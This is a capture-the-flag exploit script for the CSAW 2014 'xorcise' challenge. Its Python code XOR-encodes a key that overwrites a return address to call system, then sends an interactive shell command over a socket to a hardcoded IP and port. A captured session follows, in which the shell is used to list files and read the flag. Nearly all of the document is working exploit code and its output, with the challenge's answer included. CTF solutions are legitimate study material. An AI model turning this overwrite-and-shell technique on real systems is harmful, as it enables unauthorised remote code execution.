CSAW CTF 2014 - xorcise exploit
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#xorcise exploit
def xor(data, key):
    # XOR each byte with the repeating key and the constant 0x8F
    o = ''
    for i in range(len(data)):
        o += chr(ord(data[i]) ^ ord(key[i % len(key)]) ^ 0x8F)
    return o
key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99" #overwrite ret decipher x plt@system
cmd = "/bin/sh -i <&4 >&4 2>&4"
cmd += "\x00" * (128 - len(cmd))
s = NullSocket("128.238.66.227", 24001)
s.write(chr(135) + key + xor(cmd, key))
s.interactive()
'''
sh: cannot set terminal process group (134): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3$ id
id
uid=1000(xor) gid=1000(xor) groups=1000(xor)
sh-4.3$ ls -la
ls -la
total 44
drwxr-xr-x 2 root root 4096 Sep 20 00:18 .
drwxr-xr-x 3 root root 4096 Sep 14 14:14 ..
-rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt
-rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c
sh-4.3$ cat flag.txt
ceat flag.txt
flag{code_exec>=crypto_break}
sh-4.3$ exit
exit
exit
*** Connection closed by remote host ***
'''